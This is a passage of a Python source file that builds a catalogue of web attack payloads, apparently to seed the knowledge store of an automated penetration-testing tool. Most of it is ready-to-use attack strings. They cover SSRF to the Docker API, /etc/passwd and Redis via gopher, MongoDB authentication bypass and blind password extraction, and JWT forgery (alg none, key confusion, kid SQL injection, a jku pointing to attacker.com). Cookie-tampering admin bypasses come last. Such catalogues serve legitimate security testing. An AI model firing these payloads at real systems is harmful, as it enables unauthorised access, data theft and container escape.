        category="ssrf",
        payload="http://localhost:2375/version",
        description="Docker API access",
        use_case="Container escape",
        bypass_technique=None,
        context="url",
        tags=["internal", "docker"],
    ),
    
    # Protocol Schemes
    PayloadEntry(
        id=generate_payload_id("ssrf", "file_scheme"),
        name="SSRF - File Scheme",
        category="ssrf",
        payload="file:///etc/passwd",
        description="Local file read via file://",
        use_case="File read",
        bypass_technique=None,
        context="url",
        tags=["file-read"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "dict_scheme"),
        name="SSRF - Dict Scheme",
        category="ssrf",
        payload="dict://localhost:6379/INFO",
        description="Redis info via dict://",
        use_case="Redis enumeration",
        bypass_technique=None,
        context="url",
        tags=["redis", "protocol"],
    ),
    PayloadEntry(
        id=generate_payload_id("ssrf", "gopher_redis"),
        name="SSRF - Gopher Redis",
        category="ssrf",
        payload="gopher://localhost:6379/_*1%0d%0a$4%0d%0aINFO%0d%0a",
        description="Redis via gopher protocol",
        use_case="Redis command execution",
        bypass_technique=None,
        context="url",
        tags=["redis", "gopher"],
    ),
]


# ============================================================================
# NoSQL Injection Payloads
# ============================================================================

NOSQL_PAYLOADS = [
    # MongoDB
    PayloadEntry(
        id=generate_payload_id("nosql", "mongo_bypass_json"),
        name="NoSQL - MongoDB JSON Bypass",
        category="nosql",
        payload='{"username": {"$ne": ""}, "password": {"$ne": ""}}',
        description="Bypass auth with $ne operator",
        use_case="MongoDB authentication bypass",
        bypass_technique=None,
        context="body",
        tags=["mongodb", "auth-bypass"],
    ),
    PayloadEntry(
        id=generate_payload_id("nosql", "mongo_bypass_param"),
        name="NoSQL - MongoDB Parameter Bypass",
        category="nosql",
        payload="username[$ne]=admin&password[$ne]=admin",
        description="Auth bypass via URL parameters",
        use_case="GET/POST parameter injection",
        bypass_technique=None,
        context="url",
        tags=["mongodb", "auth-bypass"],
    ),
    PayloadEntry(
        id=generate_payload_id("nosql", "mongo_regex"),
        name="NoSQL - MongoDB Regex Extraction",
        category="nosql",
        payload='{"username": "admin", "password": {"$regex": "^a.*"}}',
        description="Extract password char by char",
        use_case="Blind NoSQL injection",
        bypass_technique=None,
        context="body",
        tags=["mongodb", "blind", "extraction"],
    ),
    PayloadEntry(
        id=generate_payload_id("nosql", "mongo_where"),
        name="NoSQL - MongoDB $where",
        category="nosql",
        payload='{"$where": "this.username == \'admin\'"}',
        description="JavaScript execution via $where",
        use_case="When $where is allowed",
        bypass_technique=None,
        context="body",
        tags=["mongodb", "javascript"],
    ),
    PayloadEntry(
        id=generate_payload_id("nosql", "mongo_js_rce"),
        name="NoSQL - MongoDB JS Injection",
        category="nosql",
        payload='{"$where": "function(){return this.username == \'admin\' && sleep(5000)}"}',
        description="Time-based blind NoSQL",
        use_case="Confirm injection",
        bypass_technique=None,
        context="body",
        tags=["mongodb", "blind", "time-based"],
    ),
]


# ============================================================================
# JWT Payloads
# ============================================================================

JWT_PAYLOADS = [
    PayloadEntry(
        id=generate_payload_id("jwt", "alg_none"),
        name="JWT - Algorithm None",
        category="jwt",
        payload='{"alg":"none","typ":"JWT"}',
        description="Remove signature verification",
        use_case="Algorithm confusion",
        bypass_technique="alg-none",
        context="header",
        tags=["algorithm", "bypass"],
    ),
    PayloadEntry(
        id=generate_payload_id("jwt", "alg_hs256_weak"),
        name="JWT - Weak Secret Brute Force",
        category="jwt",
        payload="jwt-cracker token.txt wordlist.txt",
        description="Brute force weak secret",
        use_case="When secret is weak",
        bypass_technique="brute-force",
        context="body",
        tags=["brute-force", "secret"],
    ),
    PayloadEntry(
        id=generate_payload_id("jwt", "alg_confusion"),
        name="JWT - RS256 to HS256",
        category="jwt",
        payload='{"alg":"HS256","typ":"JWT"} + sign with public key',
        description="Use public key as HMAC secret",
        use_case="Algorithm confusion attack",
        bypass_technique="alg-confusion",
        context="header",
        tags=["algorithm", "confusion"],
    ),
    PayloadEntry(
        id=generate_payload_id("jwt", "kid_injection"),
        name="JWT - KID Injection",
        category="jwt",
        payload='{"alg":"HS256","typ":"JWT","kid":"../../dev/null"}',
        description="Inject path in kid parameter",
        use_case="LFI via kid parameter",
        bypass_technique="kid-injection",
        context="header",
        tags=["kid", "lfi"],
    ),
    PayloadEntry(
        id=generate_payload_id("jwt", "kid_sqli"),
        name="JWT - KID SQLi",
        category="jwt",
        payload='{"alg":"HS256","typ":"JWT","kid":"key\' UNION SELECT \'secret\'--"}',
        description="SQL injection in kid",
        use_case="SQLi via kid parameter",
        bypass_technique="kid-sqli",
        context="header",
        tags=["kid", "sqli"],
    ),
    PayloadEntry(
        id=generate_payload_id("jwt", "jku_injection"),
        name="JWT - JKU Injection",
        category="jwt",
        payload='{"alg":"RS256","typ":"JWT","jku":"http://attacker.com/jwks.json"}',
        description="Point to attacker JWKS",
        use_case="When jku is trusted",
        bypass_technique="jku-injection",
        context="header",
        tags=["jku", "ssrf"],
    ),
]


# ============================================================================
# All Payloads Combined
# ============================================================================

ALL_PAYLOADS: list[PayloadEntry] = (
    SQLI_PAYLOADS +
    XSS_PAYLOADS +
    SSTI_PAYLOADS +
    LFI_PAYLOADS +
    RCE_PAYLOADS +
    XXE_PAYLOADS +
    SSRF_PAYLOADS +
    NOSQL_PAYLOADS +
    JWT_PAYLOADS
)


def get_payloads_by_category(category: str) -> list[PayloadEntry]:
    """Get all payloads for a specific category."""
    return [p for p in ALL_PAYLOADS if p.category == category]


def get_all_categories() -> list[str]:
    """Get list of all payload categories."""
    return list(set(p.category for p in ALL_PAYLOADS))


def get_payload_count() -> int:
    """Get total number of payloads."""
    return len(ALL_PAYLOADS)


def get_payload_stats() -> dict[str, int]:
    """Get count of payloads per category."""
    stats: dict[str, int] = {}
    for payload in ALL_PAYLOADS:
        stats[payload.category] = stats.get(payload.category, 0) + 1
    return stats


# ============================================================================
# Seeding Function
# ============================================================================

async def seed_payloads(store) -> int:
    """Seed the knowledge store with all payloads.
    
    Args:
        store: KnowledgeStore or InMemoryKnowledgeStore instance
        
    Returns:
        Number of payloads added
    """
    return await store.add_payloads(ALL_PAYLOADS)


if __name__ == "__main__":
    # Print statistics when run directly
    print(f"Total payloads: {get_payload_count()}")
    print("\nPayloads by category:")
    for category, count in sorted(get_payload_stats().items()):
        print(f"  {category}: {count}")

# ============================================================================
# Web Authentication Bypass Payloads
# ============================================================================

WEB_AUTH_PAYLOADS = [
    # Cookie Manipulation - Naive (Level 2)
    PayloadEntry(
        id=generate_payload_id("web_auth", "cookie_admin_true"),
        name="Admin Cookie - Boolean",
        category="web_auth",
        payload="Cookie: admin=true",
        description="Set admin cookie to boolean true (text)",
        use_case="Simple cookie tampering",
        bypass_technique="cookie-manipulation",
        context="header",
        tags=["cookie", "admin", "bypass", "naive"],
    ),
    PayloadEntry(
        id=generate_payload_id("web_auth", "cookie_admin_1"),
        name="Admin Cookie - Numeric",
        category="web_auth",
        payload="Cookie: admin=1",
        description="Set admin cookie to numeric 1",
        use_case="Simple cookie tampering",
        bypass_technique="cookie-manipulation",
        context="header",
        tags=["cookie", "admin", "bypass", "naive"],
    ),
    PayloadEntry(
        id=generate_payload_id("web_auth", "cookie_admin_cap_true"),
        name="Admin Cookie - Capital True",
        category="web_auth",
        payload="Cookie: admin=True",
        description="Set admin cookie to Python/String True",
        use_case="Simple cookie tampering",
        bypass_technique="cookie-manipulation",
        context="header",
        tags=["cookie", "admin", "bypass", "naive"],
    ),
    PayloadEntry(
        id=generate_payload_id("web_auth", "cookie_user_admin"),
        name="User Cookie - Admin",
        category="web_auth",
        payload="Cookie: user=admin",
        description="Set user cookie to admin",
        use_case="Simple username spoofing",
        bypass_technique="cookie-manipulation",
        context="header",
        tags=["cookie", "user", "bypass", "naive"],
    ),
    PayloadEntry(
        id=generate_payload_id("web_auth", "cookie_auth_true"),
        name="Auth Cookie - True",
        category="web_auth",
        payload="Cookie: authenticated=true",
        description="Set authenticated cookie to true",
        use_case="Simple session bypass",
        bypass_technique="cookie-manipulation",
        context="header",
        tags=["cookie", "session", "bypass", "naive"],
    ),
]
